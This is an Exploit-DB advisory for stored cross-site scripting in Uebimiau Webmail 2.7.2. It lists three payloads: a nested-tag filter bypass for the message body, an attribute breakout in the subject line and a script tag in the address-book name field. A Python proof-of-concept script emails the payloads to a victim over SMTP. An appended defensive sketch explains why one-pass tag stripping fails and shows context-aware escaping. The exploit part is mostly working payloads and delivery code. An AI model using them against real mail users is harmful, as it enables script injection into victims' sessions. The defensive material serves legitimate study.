uebimiau webmail 2.7.2 – Persistent Cross-Site Scripting

  • Author: Shai rod
    Date: 2012-08-20
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/20675/
  • #!/usr/bin/python
    
    '''
    # Exploit Title: Uebimiau Webmail Stored XSS
    # Date: 17/08/2012
    # Exploit Author: Shai rod (@NightRang3r)
    # Vendor Homepage: http://www.uebimiau.org/
    # Software Link: http://www.uebimiau.org/downloads/uebimiau-2.7.2-any.zip
    # Version: 2.7.2
     
    #Gr33Tz: @aviadgolan , @benhayak, @nirgoldshlager, @roni_bachar
    
    
    About the Application:
    ======================
    
    Uebimiau is a universal webmail developed in PHP by Aldoir Ventura.
    It is free and can be installed in any email server.
    
    -It runs under any System;
    -It doesn't require any extra PHP modules;
    -Doesn't need a database (such as MySQL, PostgreSQL, etc.)
    -Doesn't need IMAP, but compatible with POP3 and IMAP
    -Compatible with the MIME Standard (send/receive text/html emails);
    -Doesn't need cookies;
    -Easy installation. You only modify one file;
    -Compatible with Apache, PHP, Sendmail or QMAIL;
    -Can be easily translated into any language (already translated in 17 languages);
    -Can use a variety of skins
    
    
    
    
    Vulnerability Description
    =========================
    
    
    1. Stored XSS in e-mail body.
    
    XSS Payload: <scr<script>ipt></scr</script>ipt>'//\';alert(String.fromCharCode(88,83,83))//\";</script>
    
    Send an email to the victim with the payload in the email body, once the user opens the message the XSS should be triggered.
    
    
    2. Stored XSS in "Title" field (works when victim opens message in full view).
    
    XSS Payload: SubjectGoesHere"><img src='https://www.exploit-db.com/exploits/20675/1.jpg'onerror=javascript:alert("XSS")>
    
    This one requires you to send at least 2 messages to the victim with the payload in the email subject.
    
    Location of injection in page source:
    
    <a class="menu" href="https://www.exploit-db.com/exploits/20675/readmsg.php?folder=inbox&pag=1&ix=1&sid={4F0FCD8FECD59-4F0FCD8FECD6C-1326435727}&tid=0&lid=5" 
    title="Uebimiau Webmail Stored XSS POC "><img src='https://www.exploit-db.com/exploits/20675/1.jpg'onerror=javascript:alert("XSS")>">Next</a> :: 
    <a class="menu" href="javascript:goback()">Back</a> ::
    
    3. Stored XSS in Address Book
    
    XSS Payload: <script>alert("XSS")</script>
    
    Create a new contact with the XSS Payload in the "Name" field, Save contact, XSS Should be triggered when viewing contacts.
    
    '''
    
    import smtplib
    
    print("###############################################")
    print("#Uebimiau Webmail Stored XSS POC#")
    print("#Coded by: Shai rod #")
    print("# @NightRang3r#")
    print("# http://exploit.co.il#")
    print("# For Educational Purposes Only!#")
    print("###############################################\r\n")
    
    # SETTINGS
    
    sender = "attacker@localhost"
    smtp_login = sender
    smtp_password = "qwe123"
    recipient = "victim@localhost"
    smtp_server= "10.0.0.5"
    smtp_port = 25
    subject = "Uebimiau Webmail Stored XSS POC"
    xss_payload_1 = """ "><img src='https://www.exploit-db.com/exploits/20675/1.jpg'onerror=javascript:alert("XSS")>"""
    xss_payload_2 ="""<scr<script>ipt></scr</script>ipt>'//\';alert(String.fromCharCode(88,83,83))//\";</script>"""
    # SEND E-MAIL
    
    print("[*] Sending E-mail to " + recipient + "...")
    # recipient is a single address string, so it goes into the To header as-is
    msg = ("From: %s\r\nTo: %s\r\nSubject: %s\n"
     % (sender, recipient, subject + xss_payload_1) )
    msg += "Content-type: text/html\n\n"
    msg += """Nothing to see here...\r\n"""
    msg += xss_payload_2
    server = smtplib.SMTP(smtp_server, smtp_port)
    server.ehlo()
    server.starttls()
    server.login(smtp_login, smtp_password)
    print("[*] Sending Message 1\r")
    server.sendmail(sender, recipient, msg)
    print("[*] Sending Message 2\r")
    server.sendmail(sender, recipient, msg)
    server.quit()
    print("[+] E-mail sent!")
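
All three injection points described above come down to untrusted mail data reaching the page without encoding for its output context. The following Python sketch is an added example, not part of the original advisory or of Uebimiau's code; the single-pass script-tag filter, the function names, the simplified `href` and the sample strings are assumptions constructed for illustration. It shows why a one-pass tag-stripping filter reassembles the nested `<scr<script>ipt>` form, and how context-aware encoding handles the subject and contact-name cases.

```python
import html
import re

# Constructed sample inputs modelled on the three injection points in the advisory.
BODY = "<scr<script>ipt>alert(1)</scr</script>ipt>"
SUBJECT = 'Hello"><img src=x onerror=alert(1)>'
CONTACT = "<script>alert(1)</script>"

SCRIPT_TAG = re.compile(r"</?script[^>]*>", re.IGNORECASE)


def strip_once(text):
    """Weak filter (assumed for illustration): delete script tags in a single pass."""
    return SCRIPT_TAG.sub("", text)


def render_next_link(subject, href="readmsg.php?ix=1"):
    """Hardened: encode the subject for a double-quoted attribute value."""
    return '<a class="menu" href="%s" title="%s">Next</a>' % (
        html.escape(href, quote=True),
        html.escape(subject, quote=True),
    )


def render_contact(name):
    """Hardened: encode the contact name for HTML element content."""
    return "<td>%s</td>" % html.escape(name, quote=True)


def render_body_as_text(body):
    """Hardened: show the body as text. Rendering HTML mail instead needs an
    allow-list sanitizer, which is out of scope for this sketch."""
    return "<pre>%s</pre>" % html.escape(body, quote=True)


if __name__ == "__main__":
    # Removing the inner tags lets the outer fragments join into a working tag.
    print("strip_once  :", strip_once(BODY))
    print("title attr  :", render_next_link(SUBJECT))
    print("contact name:", render_contact(CONTACT))
    print("body as text:", render_body_as_text(BODY))
```

Encoding at output time, per context, is what closes the subject and address-book cases; stripping on input leaves the reassembly problem shown by `strip_once`.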